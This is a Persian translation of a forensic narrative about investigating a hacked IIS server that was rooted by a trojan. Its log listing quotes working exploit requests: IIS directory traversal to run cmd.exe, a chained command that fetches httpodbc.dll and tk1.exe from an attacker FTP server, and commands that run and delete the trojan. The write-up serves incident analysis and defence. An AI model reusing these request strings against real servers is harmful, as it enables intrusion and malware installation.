
‫ﺭﻭ ﺩﺭ ﺭﻭﻱ ﺍﻧﻮﺍﻉ ﻫﻜﺮ‬

رو در روی انواع هکر


« قسمت سوم »
مترجم: رضا مددی
تاریخ: اول اردیبهشت ۱۳۸۳
نویسندگان: Cyrus Peikari, Seth Fogie

همه چیز با تماس سادهٔ یک مشتری نگران شروع شد. شکایت او افت سرعت اتصال دستگاهش به اینترنت بود. از همین نشانهٔ ساده بود که در نهایت متوجه شدم سرور اصلیِ اتصال به اینترنت، مکرراً قربانی ویروس‌ها و هکرها شده است. هکرها با استفاده از کدهای اکسپلویت عمومی برای آسیب‌پذیری‌های شناخته‌شدهٔ IIS، کنترل سرور وب و از آن طریق کامپیوتر مشتری را در اختیار گرفته بودند و حتی می‌توانستند آن را به یک سرور warez که میزبان بیش از ۳ گیگابایت نرم‌افزار غیرمجاز بود تبدیل کنند.
بر این اساس، به مشتری گفتم که باید فوراً سرور را از نو و از رسانهٔ سالم نصب کند و پیش از بازگرداندن آن به شبکه، تمام Service Packها و وصله‌های امنیتی ضروری را روی آن نصب کند؛ سروری که یک بار به‌طور کامل در اختیار مهاجم قرار گرفته است، با «تمیز کردن» درجا دیگر قابل اعتماد نیست. بعد از بحث با مشتری بر سر تمهیدات محافظتی ممکن، سریعاً به کند و کاو راه دور فایل‌های سرور پرداختم و تا حد مقدور از روش‌ها و حقه‌هایی که هکرها برای در اختیار گرفتن سرور استفاده کرده بودند، اطلاعات جمع‌آوری کردم. اما پس از حدوداً دو ساعت کند و کاو، متوجه شدم که هم سرور وب و هم درِ پشتی‌ای (Back Door) که خودم برای دسترسی راه دور از آن استفاده می‌کردم، هر دو دیگر پاسخی نمی‌دهند و فعالیتی ندارند.
از اینجا به بعد، روایت بر اساس همین ماجرای واقعی دنبال می‌شود. بنابراین بدون هیچ حرف اضافه‌ای اجازه دهید داستان را ادامه دهیم.

روت‌شده (Rooted) با Tkbot.R00t.EDITiON.FiNAL


حالا من بدون هیچ راهی برای دستیابی راه دور به سرور مانده بودم. اولین حدسم این بود که مدیر سرور آن را از کار انداخته است؛ اما با یک Ping و یک اسکن پورت به سرعت متوجه شدم که سرور Offline نیست و فعال است. با یک تماس تلفنی با مدیر هم روشن شد که او هنوز هیچ کاری انجام نداده است.


نکتهٔ جالب این بود که اسکن پورت‌ها همان پورت‌های باز قبلی را نشان می‌داد، به‌اضافهٔ دو پورت جدید 1297 و 65130، و منهای دو پورت 80 (سرور وب) و 99 (پورتی که درِ پشتی ncx99.exe روی آن گوش می‌داد). چون راه دیگری نداشتم، تصمیم گرفتم با برنامه‌های Telnet و FTP به این دو پورت جدید متصل شوم تا ببینم چه پاسخی برمی‌گردانند. در کمال تعجب، به نظر می‌رسید که سرور بار دیگر قربانی هکر دیگری شده است (همان‌طور که در شکل شمارهٔ ۱ می‌بینید). با این تفاوت که این بار، هکر به پاک کردن راه‌های ورودی که هکرهای قبلی برای دسترسی به سرور استفاده کرده بودند نیز توجه داشته است؛ بسته شدن پورت‌های 80 و 99 را می‌توان از همین زاویه نگاه کرد.

شکل ۱
اتصال Telnet به پورت 65130 در سرور هک‌شده

بعد از چندین تلاش برای حدس زدن کلمات عبور متداول، دوباره با مدیر سرور تماس گرفتم تا از آخرین اتفاقات باخبر شوم. در همین تماس، از او اجازه خواستم تا سرور را در محلی که دستگاه در آن قرار داشت به‌صورت حضوری بررسی کنم، و درخواست کردم


تا اطلاعات حساب (Account) مدیر را که برای دستیابی به سرور لازم است در اختیارم قرار دهد.

‫ﺷﺮﻭﻉ ﺑﺎﺯﻱ‪ :‬ﺭﻭﺯ ﺩﻭﻡ‪ ،‬ﺑﻌﺪﺍﺯﻇﻬﺮ‬


تا بعدازظهرِ روز بعد نمی‌توانستم به سایت دسترسی داشته باشم؛ بنابراین از زمان باقی‌مانده برای طراحی روشی برای رسیدن به هدفم استفاده کردم. پس از بررسی گزینه‌های موجود، برایم روشن شد که بهترین راه برای فهمیدن اینکه هکر چگونه برنامهٔ خود (درِ پشتی) را نصب کرده، به‌دست آوردن یکی از کلمات عبور Telnet یا FTP است که هکر هنگام ورود به سیستم استفاده می‌کند. همچنین برنامه‌ریزی کردم تا نگاهی دقیق به فایل‌های Log و سیستم فایل داشته باشم و ببینم می‌توان تغییراتی مرتبط با این ماجرا را در ۲۴ ساعت گذشته پیدا کرد یا نه. با آنکه این کار مانند انداختن تیری در تاریکی بود، در نهایت به بهترین وجه و به‌طور غیرمنتظره‌ای پاسخی به من داد که اصلاً به دنبالش نبودم.

هنگامی که به سایت رسیدم، فوراً کارگاهم را برپا کردم. چون شبکهٔ سایت به جای سوئیچ از هاب استفاده می‌کرد، به‌راحتی می‌توانستم کامپیوتر همراهم را به شبکه وصل کنم و از همان نقطه شنود (sniff) ترافیک شبکه را آغاز کنم.

هاب‌ها هر فریم را به همهٔ پورت‌ها می‌فرستند و به هر دستگاه واگذار می‌کنند که خودش تشخیص دهد کدام بسته‌ها برای اوست. در مقابل، سوئیچ‌ها آدرس سخت‌افزاری (MAC) هر دستگاه متصل را دنبال می‌کنند و ترافیک را فقط به پورتی می‌فرستند که مقصدش آنجاست. همین امر شنود ترافیک در یک شبکهٔ سوئیچی را دشوارتر (هرچند نه غیرممکن) می‌سازد.

هدف من این بود که اول داده‌ها را جمع‌آوری کنم و سپس در فرصت مناسب آنها را تحلیل کنم. برای این کار Tcpdump را روی کامپیوتر همراهم که Linux روی آن اجرا می‌شد راه انداختم و آن را برای ذخیرهٔ ترافیک ضبط‌شده در یک فایل روی هارد تنظیم کردم. با این کار، شروع به جستجو در سیستم فایل، اتصالات شبکه و سرویس‌های در حال اجرا و اجراشدهٔ سرور نمودم.


با NetStat شروع کردم که اطلاعات اتصالات شبکهٔ دستگاه را نشان می‌دهد. همان‌طور که در شکل شمارهٔ ۲ می‌بینید، چندین اتصال مشکوک کاملاً واضح بودند (به ارتباط‌ها با سرورهای IRC توجه کنید). سپس به فهرست Taskها که برنامه‌های در حال اجرا را نشان می‌دهد نگاهی انداختم و متوجه سرویس غیرمعمولی با نام FireDaemon شدم. (توجه: خروجی ابزارهایی مانند NetStat و فهرست Task که روی خودِ میزبان آلوده اجرا می‌شوند، در حضور Root Kit قابل اعتماد کامل نیست و باید با دادهٔ مستقلی مانند ترافیک ضبط‌شده از بیرون مقایسه شود.) پس از یک جستجوی Online در همان لحظه فهمیدم که FireDaemon یک ابزار کمکی است که اجازه می‌دهد هر برنامه یا اسکریپت Win32 (مانند BAT/CMD، Perl، Java، Python) را به‌عنوان یک سرویس NT/2K/XP نصب و اجرا کنید. به عبارت دیگر این نرم‌افزار — که خود یک ابزار مدیریتی مشروع است و نه بدافزار — رؤیای یک هکر را به حقیقت تبدیل می‌کند: با نصب Root Kit به‌عنوان یک سرویس، هکر به‌سادگی تضمین می‌کند که Root Kit حتی پس از Reboot شدن سرور هم دوباره اجرا خواهد شد.

شکل ۲
نتایج بازگشتی NetStat روی سرور هک‌شده.

در نهایت شروع به کاوش در خود سرور کردم تا ببینم می‌توان مسیر ورود هکر را بازسازی کرد یا نه. با Logهای سرور وب شروع کردم و ورودی‌های لیست ۱ را پیدا کردم. این ورودی‌ها زنجیرهٔ حمله را نشان می‌دهند: (۱) استفاده از آسیب‌پذیری پیمایش دایرکتوری IIS (‎..%5c..%5c‎) برای اجرای cmd.exe و کپی کردن آن به پوشهٔ scripts با نام script.exe؛ (۲) ساختن یک اسکریپت FTP و دانلود httpodbc.dll و tk1.exe از سرور مهاجم با ورود anonymous؛ (۳) اجرای tk1.exe از طریق httpodbc.dll؛ و (۴) حذف tk1.exe از روی دیسک برای پاک کردن شواهد. توجه کنید که هر چهار درخواست کد وضعیت 200 برگردانده‌اند، یعنی همگی با موفقیت اجرا شده‌اند.

لیست ۱ — ورودی‌های Log سرور وب (IIS)؛ آدرس‌ها با xxx پنهان شده‌اند:

```
209.115.xxx.xxx, -, 10/31/02, 16:01:11, W3SVC, EXCHANGE, 64.3.xxx.xxx, 859, 156, 331, 200, 0, GET, /scripts/..%5c..%5cwinnt/system32/cmd.exe, /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\script.exe,
209.115.xxx.xxx, -, 10/31/02, 16:02:44, W3SVC, EXCHANGE, 64.3.xxx.xxx, 83250, 270, 148, 200, 0, GET, /scripts/script.exe, /c+echo+open+209.184.xxx.xxx>tmp2&&echo+anonymous>>tmp2&&echo+a@a.com>>tmp2&&echo+get+httpodbc.dll>>tmp2&&echo+get+tk1.exe>>tmp2&&echo+bye>>tmp2&&echo+ftp+-s:tmp2>>tmp2.cmd&&echo+exit>>tmp2.cmd&&tmp2.cmd,
209.115.xxx.xxx, -, 10/31/02, 16:06:11, W3SVC, EXCHANGE, 64.3.xxx.xxx, 703, 170, 572, 200, 0, GET, /scripts/httpodbc.dll, MfcISAPICommand=Exploit&cmd=c%3A%5Cwinnt%5Csystem32%5Ccmd.exe+%2Fc+c%3A%5Cinetpub%5Cscripts%5Ctk1.exe,
209.115.xxx.xxx, -, 10/31/02, 16:06:26, W3SVC, EXCHANGE, 64.3.xxx.xxx, 828, 174, 576, 200, 0, GET, /scripts/httpodbc.dll, MfcISAPICommand=Exploit&cmd=c%3A%5Cwinnt%5Csystem32%5Ccmd.exe+%2Fc+del+c%3A%5Cinetpub%5Cscripts%5Ctk1.exe,
```

با دنبال کردن مسیرهایی که در این ورودی‌ها آمده بود به پوشهٔ scripts رسیدم و در آنجا سه فایل tmp2، tmp2.cmd و httpodbc.dll را یافتم. دو فایل اول را در NotePad باز کردم: یکی فایل دستورات FTP و دیگری یک فایل دسته‌ای (Batch) بود که فایل‌های tk1.exe و httpodbc.dll (فایلی که عموماً توسط کرم Nimda مورد استفاده قرار می‌گیرد) را download کرده بود. خودِ tk1.exe، همان‌طور که آخرین ورودی Log نشان می‌دهد، پس از اجرا از روی دیسک حذف شده بود. چون فایل دستورات FTP به سروری با ورود ناشناس (anonymous) اشاره داشت، من هم به آن سرور FTP که هنوز در حال اجرا بود وارد شدم و یک کپی از فایل را برای بررسی‌های بعدی برداشتم. (تذکر: اتصال به زیرساخت مهاجم، حضور بررسی‌کننده را برای او آشکار می‌کند و ممکن است ملاحظات قانونی داشته باشد؛ بهتر است از یک آدرس غیرقابل انتساب و با هماهنگی انجام شود.)
با ادامهٔ جستجو در سرور، تقریباً مطمئن شدم که همین هک، دلیل Offline شدن سرور وب و نیز باز شدن دو پورت جدید روی سرور بوده است. این برداشت بر دو واقعیت استوار بود: دانلود فایل tk1.exe چند ثانیه پیش از آن رخ داده بود که ثبت Log سرور وب متوقف شود، و سرور FTP که روی پورت 65130 اجرا می‌شد، بنر "TK DISTRO" را نشان می‌داد.
در این مرحله آمادهٔ رفتن به خانه شدم. با توجه به خروجی NetStat و اطلاعات تازه دربارهٔ فایل مرموز TK، حدس می‌زدم که این هک یک تروجان مرکب FTP/Back Door/IRC است که همگی در یک فایل واحد (tk1.exe) بسته‌بندی شده‌اند. در هر حال این نظریه معتبر به نظر می‌رسید.

